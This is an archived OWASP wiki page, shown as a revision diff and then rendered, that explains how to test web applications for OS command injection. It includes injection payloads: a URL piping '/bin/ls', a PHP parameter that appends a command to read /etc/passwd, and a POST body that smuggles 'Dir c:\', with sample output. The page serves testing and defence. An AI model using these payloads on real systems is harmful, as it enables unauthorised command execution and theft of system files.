This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org
Difference between revisions of "Testing for Command Injection (OTG-INPVAL-013)"
(→References) |
|||
| Line 3: | Line 3: | ||
== Brief Summary == | == Brief Summary == | ||
| − | In this paragraph we describe how to test an application for OS | + | In this paragraph we describe how to test an application for OS commanding testing: this means try to inject an on command throughout an HTTP request to the application. |
== Short Description of the Issue == | == Short Description of the Issue == | ||
| Line 29: | Line 29: | ||
'''Example'''<br> | '''Example'''<br> | ||
| − | Consider the case of an application that contains a set of documents that you can browse from the Internet. If you fire up | + | Consider the case of an application that contains a set of documents that you can browse from the Internet. If you fire up WebScarab, you can obtain a POST HTTP like the following: |
<pre> | <pre> | ||
POST http://www.example.com/public/doc HTTP/1.1 | POST http://www.example.com/public/doc HTTP/1.1 | ||
Host: www.example.com | Host: www.example.com | ||
| − | User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20061010 | + | User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20061010 FireFox/2.0 |
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 | Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 | ||
Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3 | Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3 | ||
| Line 48: | Line 48: | ||
Doc=Doc1.pdf | Doc=Doc1.pdf | ||
</pre> | </pre> | ||
| − | In this post we notice how the application retrieve the public documentations. Now we can test if it is | + | In this post we notice how the application retrieve the public documentations. Now we can test if it is possible to add an operative system command to inject in the POST HTTP. Try the following: |
<pre> | <pre> | ||
POST http://www.example.com/public/doc HTTP/1.1 | POST http://www.example.com/public/doc HTTP/1.1 | ||
Host: www.example.com | Host: www.example.com | ||
| − | User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20061010 | + | User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20061010 FireFox/2.0 |
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 | Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 | ||
Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3 | Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3 | ||
| Line 66: | Line 66: | ||
Content-length: 33 | Content-length: 33 | ||
| − | Doc=Doc1.pdf+|+ | + | Doc=Doc1.pdf+|+Dir c:\ |
</pre> | </pre> | ||
If the application doesn't validate the request, we can obtain the following result: | If the application doesn't validate the request, we can obtain the following result: | ||
<pre> | <pre> | ||
| − | + | Exec Results for 'cmd.exe /c type "C:\httpd\public\doc\"Doc=Doc1.pdf+|+Dir c:\' | |
Output... | Output... | ||
Il volume nell'unità C non ha etichetta. | Il volume nell'unità C non ha etichetta. | ||
| − | Numero di serie | + | Numero di serie Del volume: 8E3F-4B61 |
Directory of c:\ | Directory of c:\ | ||
18/10/2006 00:27 2,675 Dir_Prog.txt | 18/10/2006 00:27 2,675 Dir_Prog.txt | ||
| Line 95: | Line 95: | ||
Software | Software | ||
24/10/2006 18:25 | 24/10/2006 18:25 | ||
| − | + | Setup | |
24/10/2006 23:37 | 24/10/2006 23:37 | ||
Technologies | Technologies | ||
| Line 101: | Line 101: | ||
3 File 32,496 byte | 3 File 32,496 byte | ||
13 Directory 6,921,269,248 byte disponibili | 13 Directory 6,921,269,248 byte disponibili | ||
| − | + | Return code: 0 | |
</pre> | </pre> | ||
| Line 108: | Line 108: | ||
== Gray Box testing == | == Gray Box testing == | ||
<b>Sanitization</b><br> | <b>Sanitization</b><br> | ||
| − | The URL and form data needs to be sanitized for invalid characters. A “blacklist” of characters is an option but it may be difficult to think of all of the characters to validate against. Also there may be some that were not discovered as of yet. A | + | The URL and form data needs to be sanitized for invalid characters. A “blacklist” of characters is an option but it may be difficult to think of all of the characters to validate against. Also there may be some that were not discovered as of yet. A “white list” containing only allowable characters should be created to validate the user input. Characters that were missed as well as undiscovered threats should be eliminated by this list.<br> |
<b>Permissions</b><br> | <b>Permissions</b><br> | ||
The web application and its components should be running under strict permissions that do not allow operating system command execution.<br> | The web application and its components should be running under strict permissions that do not allow operating system command execution.<br> | ||
== References == | == References == | ||
| − | ''' | + | '''White papers'''<br> |
* [1] Author1, Author2: "Title" - http://www.owasp.org<br> | * [1] Author1, Author2: "Title" - http://www.owasp.org<br> | ||
* [2]...<br> | * [2]...<br> | ||
Revision as of 21:16, 22 November 2006
[Up]
OWASP Testing Guide v2 Table of Contents
Brief Summary
In this paragraph we describe how to test an application for OS commanding testing: this means try to inject an on command throughout an HTTP request to the application.
Short Description of the Issue
OS Commanding is a technique used via a web interface in order to execute OS commands on the web server.
The user supplies operating system commands through a web interface in order to execute OS commands. Any web interface that is not properly sanitized is subject to this exploit. With the ability to execute OS commands, the user can upload malicious programs or even obtain passwords. OS commanding is preventable when security is emphasized during the design and development of applications.
Black Box testing and example
When viewing a file in a web application the file name is often shown in the URL. Perl allows piping data from a process into an open statement. The user can simply append the Pipe symbol “|” onto the end of the filename.
Example URL before alteration:
http://sensitive/cgi-bin/userData.pl?doc=user1.txt
Example URL modified:
http://sensitive/cgi-bin/userData.pl?doc=/bin/ls|
This will execute the command “/bin/ls”.
Appending a semicolon to the end of a URL for a .PHP page followed by an operating system command, will execute the command.
Example:
http://sensitive/something.php?dir=%3Bcat%20/etc/passwd
Example
Consider the case of an application that contains a set of documents that you can browse from the Internet. If you fire up WebScarab, you can obtain a POST HTTP like the following:
POST http://www.example.com/public/doc HTTP/1.1 Host: www.example.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20061010 FireFox/2.0 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: http://127.0.0.1/WebGoat/attack?Screen=20 Cookie: JSESSIONID=295500AD2AAEEBEDC9DB86E34F24A0A5 Authorization: Basic T2Vbc1Q9Z3V2Tc3e= Content-Type: application/x-www-form-urlencoded Content-length: 33 Doc=Doc1.pdf
In this post we notice how the application retrieve the public documentations. Now we can test if it is possible to add an operative system command to inject in the POST HTTP. Try the following:
POST http://www.example.com/public/doc HTTP/1.1 Host: www.example.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20061010 FireFox/2.0 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: http://127.0.0.1/WebGoat/attack?Screen=20 Cookie: JSESSIONID=295500AD2AAEEBEDC9DB86E34F24A0A5 Authorization: Basic T2Vbc1Q9Z3V2Tc3e= Content-Type: application/x-www-form-urlencoded Content-length: 33 Doc=Doc1.pdf+|+Dir c:\
If the application doesn't validate the request, we can obtain the following result:
Exec Results for 'cmd.exe /c type "C:\httpd\public\doc\"Doc=Doc1.pdf+|+Dir c:\'
Output...
Il volume nell'unità C non ha etichetta.
Numero di serie Del volume: 8E3F-4B61
Directory of c:\
18/10/2006 00:27 2,675 Dir_Prog.txt
18/10/2006 00:28 3,887 Dir_ProgFile.txt
16/11/2006 10:43
Doc
11/11/2006 17:25
Documents and Settings
25/10/2006 03:11
I386
14/11/2006 18:51
h4ck3r
30/09/2005 21:40 25,934
OWASP1.JPG
03/11/2006 18:29
Prog
18/11/2006 11:20
Program Files
16/11/2006 21:12
Software
24/10/2006 18:25
Setup
24/10/2006 23:37
Technologies
18/11/2006 11:14
3 File 32,496 byte
13 Directory 6,921,269,248 byte disponibili
Return code: 0
In this case We have obtained an OS Injection.
Gray Box testing
Sanitization
The URL and form data needs to be sanitized for invalid characters. A “blacklist” of characters is an option but it may be difficult to think of all of the characters to validate against. Also there may be some that were not discovered as of yet. A “white list” containing only allowable characters should be created to validate the user input. Characters that were missed as well as undiscovered threats should be eliminated by this list.
Permissions
The web application and its components should be running under strict permissions that do not allow operating system command execution.
References
White papers
- [1] Author1, Author2: "Title" - http://www.owasp.org
- [2]...
Tools
- Rogan Dawes: "OWASP WebScarab" - http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project
OWASP Testing Guide v2
Here is the OWASP Testing Guide v2 Table of Contents
